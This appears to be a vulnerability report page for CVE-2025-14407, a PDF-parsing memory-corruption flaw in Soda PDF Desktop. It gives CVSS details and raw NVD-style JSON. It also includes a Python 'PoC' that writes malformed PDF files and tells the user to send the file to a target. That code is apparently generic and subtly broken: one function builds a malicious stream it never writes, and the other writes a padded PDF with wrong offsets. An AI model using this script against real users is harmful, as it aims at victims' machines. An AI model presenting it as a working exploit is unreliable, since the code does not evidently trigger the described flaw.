Security Vulnerability Report
CVE-2025-14407 CVSS 5.5 MEDIUM

CVE-2025-14407

Published: 2025-12-23 22:15:47
Last Modified: 2026-01-21 20:58:27

Description

Soda PDF Desktop PDF File Parsing Memory Corruption Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27141.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:* - VULNERABLE
Soda PDF Desktop < latest version
Soda PDF Desktop (specific versions must be confirmed through official channels)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-14407 PoC - Soda PDF Desktop PDF Parsing Memory Corruption
# This PoC generates a malicious PDF file that triggers memory corruption

from PyPDF2 import PdfWriter
from io import BytesIO
import struct


def create_malicious_pdf():
    """Create a malicious PDF that triggers memory corruption in Soda PDF Desktop"""
    # Create a basic PDF structure
    pdf_writer = PdfWriter()

    # Add a page
    from reportlab.pdfgen import canvas
    from reportlab.lib.pagesizes import letter

    packet = BytesIO()
    can = canvas.Canvas(packet, pagesize=letter)
    can.drawString(100, 750, "Malicious PDF for CVE-2025-14407")
    can.save()
    packet.seek(0)
    pdf_writer.append(packet)

    # Inject malformed stream data to trigger memory corruption
    # This exploits the lack of proper validation in PDF parsing
    malicious_stream = b""
    # Add oversized stream length to trigger buffer overflow
    malicious_stream += b"x" * 65536  # Large payload
    # Add malformed object references
    malicious_stream += b"<< /Length 999999 /Filter /FlateDecode >>"
    # Note: malicious_stream is not referenced again; the file written below
    # contains only the ReportLab-generated page.

    # Write to file
    output = BytesIO()
    pdf_writer.write(output)
    with open('CVE-2025-14407_poc.pdf', 'wb') as f:
        f.write(output.getvalue())

    print("[+] PoC PDF created: CVE-2025-14407_poc.pdf")
    print("[+] Send this file to target user to open with Soda PDF Desktop")


if __name__ == "__main__":
    create_malicious_pdf()


# Alternative: Simple malformed PDF trigger
def create_simple_poc():
    """Minimal PoC - Malformed PDF that triggers parsing vulnerability"""
    poc_pdf = b"""%PDF-1.4
1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj
2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj
3 0 obj<</Type/Page/Parent 2 0 R/Resources<</Font<</F1<</Type/Font/Subtype/Type1/BaseFont/Helvetica>>>>>>/MediaBox[0 0 612 792]/Contents 4 0 R>>endobj
4 0 obj<</Length 1000000 >>stream
""" + b"A" * 1000000 + b"""
endstream
endobj
xref
0 5
0000000000 65535 f
0000000009 00000 n
0000000058 00000 n
0000000115 00000 n
0000000214 00000 n
trailer<</Size 5/Root 1 0 R>>
startxref
1000000
%%EOF"""
    with open('CVE-2025-14407_simple_poc.pdf', 'wb') as f:
        f.write(poc_pdf)
    print("[+] Simple PoC created: CVE-2025-14407_simple_poc.pdf")


create_simple_poc()

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1080/ (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14407", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.330", "lastModified": "2026-01-21T20:58:26.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop PDF File Parsing Memory Corruption Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27141."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": 
[{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1080/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}